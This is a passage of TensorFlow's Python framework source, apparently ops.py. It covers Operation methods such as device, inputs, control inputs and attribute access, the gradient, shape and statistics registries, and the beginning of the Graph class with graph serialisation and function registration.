is_sequence = False if is_sequence: grouped_inputs.append(inputs[i:i + input_len]) else: grouped_inputs.append(inputs[i]) i += input_len assert i == len(inputs) return grouped_inputs def colocation_groups(self): """Returns the list of colocation groups of the op.""" default_colocation_group = [ compat.as_bytes("loc:@%s" % self._node_def.name) ] if "_class" not in self._node_def.attr: # This op has no explicit colocation group, so it is itself its # own root of a colocation group. return default_colocation_group attr_groups = [ class_name for class_name in self.get_attr("_class") if class_name.startswith(b"loc:@") ] # If there are no colocation groups in the explicit _class field, # return the default colocation group. return attr_groups if attr_groups else default_colocation_group def values(self): """DEPRECATED: Use outputs.""" return tuple(self.outputs) def _get_control_flow_context(self): """Returns the control flow context of this op. Returns: A context object. """ return self._control_flow_context def _set_control_flow_context(self, ctx): """Sets the current control flow context of this op. Args: ctx: a context object. """ self._control_flow_context = ctx @property def name(self): """The full name of this operation.""" if self._c_op: # TODO(iga): Remove this assert after converting to C API by default. # Just being a bit paranoid here. assert self._node_def.name == c_api.TF_OperationName(self._c_op) return c_api.TF_OperationName(self._c_op) else: return self._node_def.name @property def _id(self): """The unique integer id of this operation.""" return self._id_value @property def device(self): """The name of the device to which this op has been assigned, if any. Returns: The string name of the device to which this op has been assigned, or an empty string if it has not been assigned to a device. """ if self._c_op: # TODO(iga): Remove this assert after converting to C API by default. # Just being a bit paranoid here assert self._node_def.device == c_api.TF_OperationDevice(self._c_op) return c_api.TF_OperationDevice(self._c_op) else: return self._node_def.device @property def _output_types(self): """List this operation's output types. Returns: List of the types of the Tensors computed by this operation. Each element in the list is an integer whose value is one of the TF_DataType enums defined in c_api.h The length of this list indicates the number of output endpoints of the operation. """ if self._c_op: num_outputs = c_api.TF_OperationNumOutputs(self._c_op) output_types = [ c_api.TF_OperationOutputType(self._tf_output(i)) for i in xrange(num_outputs) ] # TODO(iga): Remove this assert after converting to C API by default. # Just being a bit paranoid here. assert self._output_types_val == output_types # In all the tests we have output_types that are passed into # Operation.__init__ are a list of ints (which is illegal according # to the docstring), but input_types are instances of DType. # This extra assert is to catch if we ever use DType for output_types. if output_types: assert isinstance(output_types[0], int) return output_types else: return self._output_types_val def _tf_output(self, output_idx): """Create and return a new TF_Output for output_idx'th output of this op.""" assert self._c_op tf_output = c_api.TF_Output() tf_output.oper = self._c_op tf_output.index = output_idx return tf_output def _tf_input(self, input_idx): """Create and return a new TF_Input for input_idx'th input of this op.""" assert self._c_op tf_input = c_api.TF_Input() tf_input.oper = self._c_op tf_input.index = input_idx return tf_input def _set_device(self, device): # pylint: disable=redefined-outer-name """Set the device of this operation. Args: device: string or device.. The device to set. """ if self._c_op: c_api.SetRequestedDevice( self._graph._c_graph, # pylint: disable=protected-access self._c_op, # pylint: disable=protected-access _device_string(device)) # TODO(nolivia): remove this line when switch to C api self._node_def.device = _device_string(device) def _add_input(self, tensor, dtype=None): """Add a new input to this operation. Args: tensor: the Tensor to add as an input. dtype: tf.DType: type of the input; defaults to the tensor's dtype. Raises: TypeError: if tensor is not a Tensor, or if input tensor type is not convertible to dtype. ValueError: if the Tensor is from a different graph. """ assert not self._c_op, ( "Operation._add_input doesn't work with C API") if not isinstance(tensor, Tensor): raise TypeError("tensor must be a Tensor: %s" % tensor) _assert_same_graph(self, tensor) if dtype is None: dtype = tensor.dtype else: dtype = dtypes.as_dtype(dtype) if not dtype.is_compatible_with(tensor.dtype): raise TypeError( "Cannot convert a tensor of type %s to an input of type %s" % (tensor.dtype.name, dtype.name)) self._inputs.append(tensor) self._input_types_val.append(dtype) tensor._add_consumer(self) # pylint: disable=protected-access self._recompute_node_def() def _update_input(self, index, tensor, dtype=None): """Update the input to this operation at the given index. NOTE: This is for TF internal use only. Please don't use it. Args: index: the index of the input to update. tensor: the Tensor to be used as the input at the given index. dtype: tf.DType: type of the input; defaults to the tensor's dtype. Raises: TypeError: if tensor is not a Tensor, or if input tensor type is not convertible to dtype. ValueError: if the Tensor is from a different graph. """ if not isinstance(tensor, Tensor): raise TypeError("tensor must be a Tensor: %s" % tensor) _assert_same_graph(self, tensor) if self._c_op: with errors.raise_exception_on_not_ok_status() as status: c_api.UpdateEdge( self._graph._c_graph, # pylint: disable=protected-access tensor._as_tf_output(), # pylint: disable=protected-access self._tf_input(index), status) else: if dtype is None: dtype = tensor.dtype else: dtype = dtypes.as_dtype(dtype) if not dtype.is_compatible_with(tensor.dtype): raise TypeError( "Cannot convert a tensor of type %s to an input of type %s" % (tensor.dtype.name, dtype.name)) self._inputs[index].consumers().remove(self) self._inputs[index] = tensor self._input_types_val[index] = dtype tensor._add_consumer(self) # pylint: disable=protected-access self._recompute_node_def() def _add_control_inputs(self, ops): """Add a list of new control inputs to this operation. Args: ops: the list of Operations to add as control input. Raises: TypeError: if ops is not a list of Operations. ValueError: if any op in ops is from a different graph. """ if self._c_op: for op in ops: if not isinstance(op, Operation): raise TypeError("op must be an Operation: %s" % op) c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access else: if ops: for op in ops: if not isinstance(op, Operation): raise TypeError("op must be an Operation: %s" % op) _assert_same_graph(self, op) self._control_inputs.append(op) self._recompute_node_def() def _add_control_input(self, op): """Add a new control input to this operation. Args: op: the Operation to add as control input. Raises: TypeError: if op is not an Operation. ValueError: if op is from a different graph. """ if self._c_op: if not isinstance(op, Operation): raise TypeError("op must be an Operation: %s" % op) c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access else: self._add_control_inputs([op]) # Methods below are used when building the NodeDef and Graph proto. def _recompute_node_def(self): del self._node_def.input[:] # pylint: disable=protected-access self._node_def.input.extend([t._as_node_def_input() for t in self._inputs]) # pylint: enable=protected-access if self._control_inputs: self._node_def.input.extend( ["^%s" % op.name for op in self._control_inputs]) def __str__(self): return str(self._node_def) def __repr__(self): return "<tf.Operation '%s' type=%s>" % (self.name, self.type) @property def outputs(self): """The list of `Tensor` objects representing the outputs of this op.""" return self._outputs # pylint: disable=protected-access class _InputList(object): """Immutable input list wrapper.""" def __init__(self, op): self._op = op def __iter__(self): return iter(self._op._inputs) def __len__(self): return len(self._op._inputs) def __bool__(self): return bool(self._op._inputs) # Python 3 wants __bool__, Python 2.7 wants __nonzero__ __nonzero__ = __bool__ def __getitem__(self, i): return self._op._inputs[i] # pylint: enable=protected-access @property def inputs(self): """The list of `Tensor` objects representing the data inputs of this op.""" if self._c_op: tf_outputs = c_api.GetOperationInputs(self._c_op) # TODO(skyewm): return Operation._InputList # pylint: disable=protected-access return [self.graph._get_tensor_by_tf_output(tf_output) for tf_output in tf_outputs] # pylint: enable=protected-access else: return Operation._InputList(self) @property def _input_dtypes(self): return self._input_types @property def _input_types(self): if self._c_op: num_inputs = c_api.TF_OperationNumInputs(self._c_op) input_types = [ dtypes.as_dtype(c_api.TF_OperationInputType(self._tf_input(i))) for i in xrange(num_inputs) ] # TODO(iga): Remove this assert after converting to C API by default. # Just being a bit paranoid here. assert self._input_types_val == input_types return input_types else: return self._input_types_val @property def control_inputs(self): """The `Operation` objects on which this op has a control dependency. Before this op is executed, TensorFlow will ensure that the operations in `self.control_inputs` have finished executing. This mechanism can be used to run ops sequentially for performance reasons, or to ensure that the side effects of an op are observed in the correct order. Returns: A list of `Operation` objects. """ if self._c_op: control_c_ops = c_api.TF_OperationGetControlInputs_wrapper(self._c_op) # pylint: disable=protected-access return [ self.graph._get_operation_by_name_unsafe( c_api.TF_OperationName(c_op)) for c_op in control_c_ops ] # pylint: enable=protected-access else: return self._control_inputs @property def type(self): """The type of the op (e.g. `"MatMul"`).""" if self._c_op: op_type = c_api.TF_OperationOpType(self._c_op) # TODO(iga): Remove these asserts after converting to C API by default. # Just being a bit paranoid here. # pylint: disable=unidiomatic-typecheck assert type(op_type) == type(self._node_def.op), ( "Expected same types %s vs %s" % (type(op_type), type(self._node_def.op))) # pylint: enable=unidiomatic-typecheck assert op_type == self._node_def.op return op_type else: return self._node_def.op @property def graph(self): """The `Graph` that contains this operation.""" return self._graph @property def node_def(self): # pylint: disable=line-too-long """Returns a serialized `NodeDef` representation of this operation. Returns: A [`NodeDef`](https://www.tensorflow.org/code/tensorflow/core/framework/node_def.proto) protocol buffer. """ # pylint: enable=line-too-long return self._node_def @property def op_def(self): # pylint: disable=line-too-long """Returns the `OpDef` proto that represents the type of this op. Returns: An [`OpDef`](https://www.tensorflow.org/code/tensorflow/core/framework/op_def.proto) protocol buffer. """ # pylint: enable=line-too-long if self._c_op: with errors.raise_exception_on_not_ok_status() as status: with c_api_util.tf_buffer() as buf: # pylint: disable=protected-access c_api.TF_GraphGetOpDef(self._graph._c_graph, compat.as_bytes(self.type), buf, status) # pylint: enable=protected-access data = c_api.TF_GetBuffer(buf) op_def = op_def_pb2.OpDef() op_def.ParseFromString(compat.as_bytes(data)) return op_def else: return self._op_def @property def traceback(self): """Returns the call stack from when this operation was constructed.""" return self._graph._convert_stack(self._traceback) # pylint: disable=protected-access @property def traceback_with_start_lines(self): """Same as traceback but includes start line of function definition. Returns: A list of 5-tuples (filename, lineno, name, code, func_start_lineno). """ return self._graph._convert_stack( # pylint: disable=protected-access self._traceback, include_func_start_lineno=True) def _set_attr(self, attr_name, attr_value): """Private method used to set an attribute in the node_def.""" if not _USE_C_API: assert "_set_attr not supported with _USE_C_API == False" return buf = c_api.TF_NewBufferFromString( compat.as_bytes(attr_value.SerializeToString())) try: with errors.raise_exception_on_not_ok_status() as status: c_api.SetAttr(self._graph._c_graph, self._c_op, attr_name, buf, status) # pylint: disable=protected-access finally: c_api.TF_DeleteBuffer(buf) def get_attr(self, name): """Returns the value of the attr of this op with the given `name`. Args: name: The name of the attr to fetch. Returns: The value of the attr, as a Python object. Raises: ValueError: If this op does not have an attr with the given `name`. """ if _USE_C_API: try: # TODO(b/65162920): remove this try/except block when all attrs are # implemented to use the _set_attr method instead of node_def.attr. with errors.raise_exception_on_not_ok_status() as status: metadata = c_api.TF_OperationGetAttrMetadata(self._c_op, name, status) with errors.raise_exception_on_not_ok_status() as status: if metadata.type == c_api.TF_ATTR_INT and metadata.is_list == 0: return c_api.TF_OperationGetAttrInt(self._c_op, name, status) except errors.InvalidArgumentError: # Colocation ops are failing to find attrs begininning with "_*". They # should fall through to the not-CAPI logic until the attribute is set # via the C-API always. pass fields = ["s", "i", "f", "b", "type", "shape", "tensor", "func"] if name not in self._node_def.attr: raise ValueError("No attr named '" + name + "' in " + str(self._node_def)) x = self._node_def.attr[name] # Treat an empty oneof value as an empty list. if not x.WhichOneof("value"): return [] if x.HasField("list"): for f in fields: if getattr(x.list, f): if f == "type": return [dtypes.as_dtype(x) for x in list(getattr(x.list, f))] else: return list(getattr(x.list, f)) return [] else: for f in fields: if x.HasField(f): if f == "type": return dtypes.as_dtype(getattr(x, f)) else: return getattr(x, f) assert False, "Unsupported field type in " + str(x) def run(self, feed_dict=None, session=None): """Runs this operation in a `Session`. Calling this method will execute all preceding operations that produce the inputs needed for this operation. *N.B.* Before invoking `Operation.run()`, its graph must have been launched in a session, and either a default session must be available, or `session` must be specified explicitly. Args: feed_dict: A dictionary that maps `Tensor` objects to feed values. See @{tf.Session.run} for a description of the valid feed values. session: (Optional.) The `Session` to be used to run to this operation. If none, the default session will be used. """ _run_using_default_session(self, feed_dict, self.graph, session) _gradient_registry = registry.Registry("gradient") class RegisterGradient(object): """A decorator for registering the gradient function for an op type. This decorator is only used when defining a new op type. For an op with `m` inputs and `n` outputs, the gradient function is a function that takes the original `Operation` and `n` `Tensor` objects (representing the gradients with respect to each output of the op), and returns `m` `Tensor` objects (representing the partial gradients with respect to each input of the op). For example, assuming that operations of type `"Sub"` take two inputs `x` and `y`, and return a single output `x - y`, the following gradient function would be registered: ```python @tf.RegisterGradient("Sub") def _sub_grad(unused_op, grad): return grad, tf.negative(grad) ``` The decorator argument `op_type` is the string type of an operation. This corresponds to the `OpDef.name` field for the proto that defines the operation. """ def __init__(self, op_type): """Creates a new decorator with `op_type` as the Operation type. Args: op_type: The string type of an operation. This corresponds to the `OpDef.name` field for the proto that defines the operation. """ if not isinstance(op_type, six.string_types): raise TypeError("op_type must be a string") self._op_type = op_type def __call__(self, f): """Registers the function `f` as gradient function for `op_type`.""" _gradient_registry.register(f, self._op_type) return f def NotDifferentiable(op_type): """Specifies that ops of type `op_type` is not differentiable. This function should *not* be used for operations that have a well-defined gradient that is not yet implemented. This function is only used when defining a new op type. It may be used for ops such as `tf.size()` that are not differentiable. For example: ```python tf.NotDifferentiable("Size") ``` The gradient computed for 'op_type' will then propagate zeros. For ops that have a well-defined gradient but are not yet implemented, no declaration should be made, and an error *must* be thrown if an attempt to request its gradient is made. Args: op_type: The string type of an operation. This corresponds to the `OpDef.name` field for the proto that defines the operation. Raises: TypeError: If `op_type` is not a string. """ if not isinstance(op_type, six.string_types): raise TypeError("op_type must be a string") _gradient_registry.register(None, op_type) # Alias for the old name, will be eventually removed. NoGradient = NotDifferentiable def get_gradient_function(op): """Returns the function that computes gradients for "op".""" if not op.inputs: return None try: op_type = op.get_attr("_gradient_op_type") except ValueError: op_type = op.type return _gradient_registry.lookup(op_type) _shape_registry = registry.Registry("shape functions") _default_shape_function_registry = registry.Registry("default shape functions") # These are set to common_shapes.call_cpp_shape_fn by op generated code # (generated by python_op_gen.cc). # It is set outside ops.py to avoid a circular dependency. _call_cpp_shape_fn = None _call_cpp_shape_fn_and_require_op = None def _set_call_cpp_shape_fn(call_cpp_shape_fn): """Sets default shape fns from passed common_shapes.call_cpp_shape_fn.""" global _call_cpp_shape_fn, _call_cpp_shape_fn_and_require_op if _call_cpp_shape_fn: return # already registered def call_without_requiring(op): return call_cpp_shape_fn(op, require_shape_fn=False) _call_cpp_shape_fn = call_without_requiring def call_with_requiring(op): return call_cpp_shape_fn(op, require_shape_fn=True) _call_cpp_shape_fn_and_require_op = call_with_requiring class RegisterShape(object): """No longer used. Was: A decorator for registering a shape function. Shape functions must now be registered via the SetShapeFn on the original Op specification in C++. """ def __init__(self, op_type): """Saves the `op_type` as the `Operation` type.""" if not isinstance(op_type, six.string_types): raise TypeError("op_type must be a string") self._op_type = op_type def __call__(self, f): """Registers "f" as the shape function for "op_type".""" if f is None: assert _call_cpp_shape_fn # None is a special "weak" value that provides a default shape function, # and can be overridden by a non-None registration. try: _default_shape_function_registry.register(_call_cpp_shape_fn, self._op_type) except KeyError: # Ignore duplicate registrations of the weak value. This can # occur if the op library input to wrapper generation # inadvertently links in one or more of the standard op # libraries. pass else: _shape_registry.register(f, self._op_type) return f def set_shapes_for_outputs(op): """Uses the registered shape functions to set the shapes for op's outputs.""" try: shape_func = _shape_registry.lookup(op.type) except LookupError: try: shape_func = _default_shape_function_registry.lookup(op.type) except LookupError: shape_func = _call_cpp_shape_fn_and_require_op shapes = shape_func(op) if shapes is None: raise RuntimeError( "Shape function for op %s did not return any shapes" % op) elif isinstance(shapes, dict): # Returned by call_cpp_shape_fn shapes_dict = shapes shapes = shapes_dict["shapes"] handle_datas = shapes_dict["handle_data"] for output, handle_data in zip(op.outputs, handle_datas): # pylint: disable=protected-access output._handle_data = handle_data # pylint: enable=protected-access if len(op.outputs) != len(shapes): raise RuntimeError( "Shape function for op %s returned %d shapes but expected %d %s %s" % (op, len(shapes), len(op.outputs), shape_func.__name__, str(shapes))) for output, s in zip(op.outputs, shapes): output.set_shape(s) class OpStats(object): """A holder for statistics about an operator. This class holds information about the resource requirements for an op, including the size of its weight parameters on-disk and how many FLOPS it requires to execute forward inference. If you define a new operation, you can create a function that will return a set of information about its usage of the CPU and disk space when serialized. The function itself takes a Graph object that's been set up so you can call methods like get_tensor_by_name to help calculate the results, and a NodeDef argument. """ def __init__(self, statistic_type, value=None): """Sets up the initial placeholders for the statistics.""" self.statistic_type = statistic_type self.value = value @property def statistic_type(self): return self._statistic_type @statistic_type.setter def statistic_type(self, statistic_type): self._statistic_type = statistic_type @property def value(self): return self._value @value.setter def value(self, value): self._value = value def __iadd__(self, other): if other.statistic_type != self.statistic_type: raise ValueError("Can't add an OpStat of type %s to one of %s." % (self.statistic_type, other.statistic_type)) if self.value is None: self.value = other.value elif other.value is not None: self._value += other.value return self _stats_registry = registry.Registry("statistical functions") class RegisterStatistics(object): """A decorator for registering the statistics function for an op type. This decorator can be defined for an op type so that it gives a report on the resources used by an instance of an operator, in the form of an OpStats object. Well-known types of statistics include these so far: - flops: When running a graph, the bulk of the computation happens doing numerical calculations like matrix multiplications. This type allows a node to return how many floating-point operations it takes to complete. The total number of FLOPs for a graph is a good guide to its expected latency. You can add your own statistics just by picking a new type string, registering functions for the ops you care about, and then calling get_stats_for_node_def. If a statistic for an op is registered multiple times, a KeyError will be raised. Since the statistics is counted on a per-op basis. It is not suitable for model parameters (capacity), which is expected to be counted only once, even if it is shared by multiple ops. (e.g. RNN) For example, you can define a new metric called doohickey for a Foo operation by placing this in your code: ```python @ops.RegisterStatistics("Foo", "doohickey") def _calc_foo_bojangles(unused_graph, unused_node_def): return ops.OpStats("doohickey", 20) ``` Then in client code you can retrieve the value by making this call: ```python doohickey = ops.get_stats_for_node_def(graph, node_def, "doohickey") ``` If the NodeDef is for an op with a registered doohickey function, you'll get back the calculated amount in doohickey.value, or None if it's not defined. """ def __init__(self, op_type, statistic_type): """Saves the `op_type` as the `Operation` type.""" if not isinstance(op_type, six.string_types): raise TypeError("op_type must be a string.") if "," in op_type: raise TypeError("op_type must not contain a comma.") self._op_type = op_type if not isinstance(statistic_type, six.string_types): raise TypeError("statistic_type must be a string.") if "," in statistic_type: raise TypeError("statistic_type must not contain a comma.") self._statistic_type = statistic_type def __call__(self, f): """Registers "f" as the statistics function for "op_type".""" _stats_registry.register(f, self._op_type + "," + self._statistic_type) return f def get_stats_for_node_def(graph, node, statistic_type): """Looks up the node's statistics function in the registry and calls it. This function takes a Graph object and a NodeDef from a GraphDef, and if there's an associated statistics method, calls it and returns a result. If no function has been registered for the particular node type, it returns an empty statistics object. Args: graph: A Graph object that's been set up with the node's graph. node: A NodeDef describing the operator. statistic_type: A string identifying the statistic we're interested in. Returns: An OpStats object containing information about resource usage. """ try: stats_func = _stats_registry.lookup(node.op + "," + statistic_type) result = stats_func(graph, node) except LookupError: result = OpStats(statistic_type) return result def _name_from_scope_name(name): """Returns the name of an op given the name of its scope. Args: name: the name of the scope. Returns: the name of the op (equal to scope name minus any trailing slash). """ return name[:-1] if (name and name[-1] == "/") else name class Graph(object): """A TensorFlow computation, represented as a dataflow graph. A `Graph` contains a set of @{tf.Operation} objects, which represent units of computation; and @{tf.Tensor} objects, which represent the units of data that flow between operations. A default `Graph` is always registered, and accessible by calling @{tf.get_default_graph}. To add an operation to the default graph, simply call one of the functions that defines a new `Operation`: ```python c = tf.constant(4.0) assert c.graph is tf.get_default_graph() ``` Another typical usage involves the @{tf.Graph.as_default} context manager, which overrides the current default graph for the lifetime of the context: ```python g = tf.Graph() with g.as_default(): # Define operations and tensors in `g`. c = tf.constant(30.0) assert c.graph is g ``` Important note: This class *is not* thread-safe for graph construction. All operations should be created from a single thread, or external synchronization must be provided. Unless otherwise specified, all methods are not thread-safe. A `Graph` instance supports an arbitrary number of "collections" that are identified by name. For convenience when building a large graph, collections can store groups of related objects: for example, the `tf.Variable` uses a collection (named @{tf.GraphKeys.GLOBAL_VARIABLES}) for all variables that are created during the construction of a graph. The caller may define additional collections by specifying a new name. """ def __init__(self): """Creates a new, empty Graph.""" # Protects the core state that may be accessed by multiple readers. # Only state that can be returned via public accessors (`as_graph_def()`, # `get_operations()`, `as_graph_element()`, `get_collection()`, and # `get_collection_ref()`) is by the lock. Thread-safety is provided on a # best-effort basis to support buggy programs, and is not guaranteed by the # public `tf.Graph` API. # NOTE(mrry): This does not protect the various stacks. A warning will # be reported if these are used from multiple threads self._lock = threading.Lock() self._nodes_by_id = dict() # GUARDED_BY(self._lock) self._next_id_counter = 0 # GUARDED_BY(self._lock) self._nodes_by_name = dict() # GUARDED_BY(self._lock) self._version = 0 # GUARDED_BY(self._lock) # Current name stack: uniquified names self._name_stack = "" # Maps a name used in the graph to the next id to use for that name. self._names_in_use = {} # Functions that will be applied to choose a device if none is specified. self._device_function_stack = [] # Default original_op applied to new ops. self._default_original_op = None # Current control flow context. It could be either CondContext or # WhileContext defined in ops/control_flow_ops.py self._control_flow_context = None # A new node will depend of the union of all of the nodes in the stack. self._control_dependencies_stack = [] # Arbitrary collections of objects. self._collections = {} # The graph-level random seed self._seed = None # A dictionary of attributes that should be applied to all ops. self._attr_scope_map = {} # A map from op type to the kernel label that should be used. self._op_to_kernel_label_map = {} # A map from op type to an alternative op type that should be used when # computing gradients. self._gradient_override_map = {} # True if the graph is considered "finalized". In that case no # new operations can be added. self._finalized = False # Functions defined in the graph self._functions = collections.OrderedDict() # Default GraphDef versions self._graph_def_versions = versions_pb2.VersionDef( producer=versions.GRAPH_DEF_VERSION, min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER) self._building_function = False # Stack of colocate_with ops self._colocation_stack = [] # Set of tensors that are dangerous to feed! self._unfeedable_tensors = set() # Set of operations that are dangerous to fetch! self._unfetchable_ops = set() # A map of tensor handle placeholder to tensor dtype. self._handle_feeders = {} # A map from tensor handle to its read op. self._handle_readers = {} # A map from tensor handle to its move op. self._handle_movers = {} # A map from tensor handle to its delete op. self._handle_deleters = {} # Resource container. if context.in_graph_mode(): self._container_prefix = "" else: # In Eager mode, isolate resources (particularly ResourceVariables) in # Graphs by default. This prevents unintended variable sharing. Graph mode # gets this kind of isolation from Sessions. self._container_prefix = "eager-execution-%d/" % (uid(),) self._container = self._container_prefix self._registered_ops = op_def_registry.get_registered_ops() # TODO(skyewm): fold as much of the above as possible into the C # implementation if _USE_C_API: self._scoped_c_graph = c_api_util.ScopedTFGraph() else: self._scoped_c_graph = None def _convert_stack(self, stack, include_func_start_lineno=False): """Converts a stack extracted using _extract_stack() to a traceback stack. Args: stack: A list of n 5-tuples, (filename, lineno, name, frame_globals, func_start_lineno). include_func_start_lineno: True if function start line number should be included as the 5th entry in return tuples. Returns: A list of n 4-tuples or 5-tuples (filename, lineno, name, code, [optional: func_start_lineno]), where the code tuple element is calculated from the corresponding elements of the input tuple. """ ret = [] for (filename, lineno, name, frame_globals, func_start_lineno, unused_frame_info) in stack: linecache.checkcache(filename) line = linecache.getline(filename, lineno, frame_globals) if line: line = line.strip() else: line = None if include_func_start_lineno: ret.append((filename, lineno, name, line, func_start_lineno)) else: ret.append((filename, lineno, name, line)) return ret def _extract_stack(self): """A lightweight, extensible re-implementation of traceback.extract_stack. NOTE(mrry): traceback.extract_stack eagerly retrieves the line of code for each stack frame using linecache, which results in an abundance of stat() calls. This implementation does not retrieve the code, and any consumer should apply _convert_stack to the result to obtain a traceback that can be formatted etc. using traceback methods. Derived classes can implement _extract_frame_info() to add extra information to the traceback. Returns: A list of 6-tuples (filename, lineno, name, frame_globals, func_start_lineno, custom_info) corresponding to the call stack of the current thread. """ try: raise ZeroDivisionError except ZeroDivisionError: f = sys.exc_info()[2].tb_frame.f_back ret = [] while f is not None: lineno = f.f_lineno co = f.f_code filename = co.co_filename name = co.co_name frame_globals = f.f_globals func_start_lineno = co.co_firstlineno frame_info = self._extract_frame_info(f) ret.append((filename, lineno, name, frame_globals, func_start_lineno, frame_info)) f = f.f_back ret.reverse() return ret def _extract_frame_info(self, frame): # pylint: disable=unused-argument """Extracts custom information from a frame in an op traceback.""" return None def _check_not_finalized(self): """Check if the graph is finalized. Raises: RuntimeError: If the graph finalized. """ if self._finalized: raise RuntimeError("Graph is finalized and cannot be modified.") def _add_op(self, op): """Adds 'op' to the graph. Args: op: the Operator or Tensor to add. Raises: TypeError: if op is not an Operation or Tensor. ValueError: if the op.name or op._id are already used. """ self._check_not_finalized() if not isinstance(op, (Tensor, Operation)): raise TypeError("op must be a Tensor or Operation: %s" % op) with self._lock: # pylint: disable=protected-access if op._id in self._nodes_by_id: raise ValueError("cannot add an op with id %d as it already " "exists in the graph" % op._id) if op.name in self._nodes_by_name: raise ValueError("cannot add op with name %s as that name " "is already used" % op.name) self._nodes_by_id[op._id] = op self._nodes_by_name[op.name] = op self._version = max(self._version, op._id) # pylint: enable=protected-access @property def _c_graph(self): if self._scoped_c_graph: return self._scoped_c_graph.graph return None @property def version(self): """Returns a version number that increases as ops are added to the graph. Note that this is unrelated to the @{tf.Graph.graph_def_versions}. Returns: An integer version that increases as ops are added to the graph. """ if self._finalized: return self._version with self._lock: return self._version @property def graph_def_versions(self): # pylint: disable=line-too-long """The GraphDef version information of this graph. For details on the meaning of each version, see [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto). Returns: A `VersionDef`. """ # pylint: enable=line-too-long if self._c_graph: with errors.raise_exception_on_not_ok_status() as status: with c_api_util.tf_buffer() as buf: c_api.TF_GraphVersions(self._c_graph, buf, status) data = c_api.TF_GetBuffer(buf) version_def = versions_pb2.VersionDef() version_def.ParseFromString(compat.as_bytes(data)) return version_def else: return self._graph_def_versions @property def seed(self): """The graph-level random seed of this graph.""" return self._seed @seed.setter def seed(self, seed): self._seed = seed @property def finalized(self): """True if this graph has been finalized.""" return self._finalized def finalize(self): """Finalizes this graph, making it read-only. After calling `g.finalize()`, no new operations can be added to `g`. This method is used to ensure that no operations are added to a graph when it is shared between multiple threads, for example when using a @{tf.train.QueueRunner}. """ self._finalized = True def _unsafe_unfinalize(self): """Opposite of `finalize`. Internal interface. NOTE: Unfinalizing a graph could have negative impact on performance, especially in a multi-threaded environment. Unfinalizing a graph when it is in use by a Session may lead to undefined behavior. Ensure that all sessions using a graph are closed before calling this method. """ self._finalized = False def _get_control_flow_context(self): """Returns the current control flow context. Returns: A context object. """ return self._control_flow_context def _set_control_flow_context(self, ctx): """Sets the current control flow context. Args: ctx: a context object. """ self._control_flow_context = ctx def _as_graph_def(self, from_version=None, add_shapes=False): # pylint: disable=line-too-long """Returns a serialized `GraphDef` representation of this graph. The serialized `GraphDef` can be imported into another `Graph` (using @{tf.import_graph_def}) or used with the [C++ Session API](../../../../api_docs/cc/index.md). This method is thread-safe. Args: from_version: Optional. If this is set, returns a `GraphDef` containing only the nodes that were added to this graph since its `version` property had the given value. add_shapes: If true, adds an "_output_shapes" list attr to each node with the inferred shapes of each of its outputs. Returns: A tuple containing a [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto) protocol buffer, and the version of the graph to which that `GraphDef` corresponds. Raises: ValueError: If the `graph_def` would be too large. """ # pylint: enable=line-too-long with self._lock: graph = graph_pb2.GraphDef() graph.versions.CopyFrom(self._graph_def_versions) bytesize = 0 for op_id in sorted(self._nodes_by_id): op = self._nodes_by_id[op_id] if from_version is None or op_id > from_version: graph.node.extend([op.node_def]) if op.outputs and add_shapes: assert "_output_shapes" not in graph.node[-1].attr graph.node[-1].attr["_output_shapes"].list.shape.extend( [output.get_shape().as_proto() for output in op.outputs]) bytesize += op.node_def.ByteSize() if bytesize >= (1 << 31) or bytesize < 0: raise ValueError("GraphDef cannot be larger than 2GB.") if self._functions: for f in self._functions.values(): bytesize += f.definition.ByteSize() if bytesize >= (1 << 31) or bytesize < 0: raise ValueError("GraphDef cannot be larger than 2GB.") graph.library.function.extend([f.definition]) if f.grad_func_name: grad_def = function_pb2.GradientDef() grad_def.function_name = f.name grad_def.gradient_func = f.grad_func_name graph.library.gradient.extend([grad_def]) return graph, self._version def as_graph_def(self, from_version=None, add_shapes=False): # pylint: disable=line-too-long """Returns a serialized `GraphDef` representation of this graph. The serialized `GraphDef` can be imported into another `Graph` (using @{tf.import_graph_def}) or used with the [C++ Session API](../../api_docs/cc/index.md). This method is thread-safe. Args: from_version: Optional. If this is set, returns a `GraphDef` containing only the nodes that were added to this graph since its `version` property had the given value. add_shapes: If true, adds an "_output_shapes" list attr to each node with the inferred shapes of each of its outputs. Returns: A [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto) protocol buffer. Raises: ValueError: If the `graph_def` would be too large. """ # pylint: enable=line-too-long result, _ = self._as_graph_def(from_version, add_shapes) return result def _is_function(self, name): """Tests whether 'name' is registered in this graph's function library. Args: name: string op name. Returns: bool indicating whether or not 'name' is registered in function library. """ return name in self._functions def _get_function(self, name): """Returns the function definition for 'name'. Args: name: string function name. Returns: The function def proto. """ return self._functions.get(name, None) def _add_function(self, function): """Adds a function to the graph. After the function has been added, you can call to the function by passing the function name in place of an op name to `Graph.create_op()`. Args: function: A `_DefinedFunction` object. Raises: ValueError: if another function is defined with the same name. """ name = function.name # Sanity checks on gradient definition. if (function.grad_func_name is not None) and (function.python_grad_func is not None): raise ValueError("Gradient defined twice for function %s" % name) # Add function to graph # pylint: disable=protected-access if self._c_graph: assert function._c_func, ( "Cannot add function created without C API support to graph " "created with C API support") with errors.raise_exception_on_not_ok_status() as status: gradient = function._grad_func._c_func if function._grad_func else None c_api.TF_GraphCopyFunction(self._c_graph, function._c_func, gradient, status) else: # If there is already a function with the same name, raise an error # if bodies are different. Else, do nothing. The C API version above # has the same behavior. previous = self._functions.get(name, None) if previous: # This check is not ideal as we can have a hash collision with only # 32 bits in the hash, but the non C API mode is being deprecated. # Don't bother changing it now. if previous._hash_str == function._hash_str: return else: raise ValueError("Another function is already defined with that name") # pylint: enable=protected-access self._functions[name] = function # Need a new-enough consumer to support the functions we add to the graph. if self._graph_def_versions.min_consumer < 12: self._graph_def_versions.min_consumer = 12 @property def building_function(self): """Returns True iff this graph represents a function.""" return self._building_function # Helper functions to create operations. def create_op( self, op_type, inputs, dtypes, # pylint: disable=redefined-outer-name input_types=None, name=None, attrs=None, op_def=None, compute_shapes=True, compute_device=True): """Creates an `Operation` in this graph. This is a low-level interface for creating an `Operation`. Most programs will not call this method directly, and instead use the Python op constructors, such as `tf.constant()`, which add ops to the default graph. Args: op_type: 